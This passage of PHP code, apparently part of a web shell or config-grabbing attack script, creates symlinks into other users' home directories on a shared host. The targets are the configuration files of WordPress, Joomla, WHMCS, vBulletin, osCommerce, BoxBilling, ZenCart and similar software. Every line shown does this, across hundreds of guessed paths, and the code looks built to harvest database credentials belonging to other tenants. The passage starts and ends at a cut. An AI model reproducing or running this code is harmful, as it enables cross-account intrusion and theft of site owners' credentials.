  1588. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1589. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1590. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1591. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1592. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1593. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1594. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1595. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1596. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1597. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1598. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1599. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1600. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1607. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1610.  
  1611. //Home2
  1612.  
  1613. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1614. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1615. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1616. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1617. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1618. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1619. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1620. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1621. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1622. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1623. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1624. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1625. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1626. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1627. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1628. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1629. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1630. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1631. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1632. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1633. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1634. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1645. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1646. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1647. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1648. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1649. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1650. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1651. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1652. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1654. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1657. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1660. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1661. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1662. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1663. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1664. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1665. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1666. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1752. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1753. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1754. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1755. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1756. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1757. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1758. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1759. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1771. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1772. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1773. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1774. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1775. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1776. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1777. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1778. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1779. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1780. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1781. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1782. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1783. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1793.  
  1794. //Home3
  1795.  
  1796. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1797. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1798. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1799. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1800. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1801. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1802. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1803. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1804. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1805. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1806. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1807. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1808. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1809. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1810. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1811. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1812. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1813. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1814. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1815. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1816. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1817. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1828. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1829. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1830. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1831. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1832. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1833. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1834. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1835. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1837. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1840. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1843. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1844. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1845. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1846. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1847. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1848. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1849. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
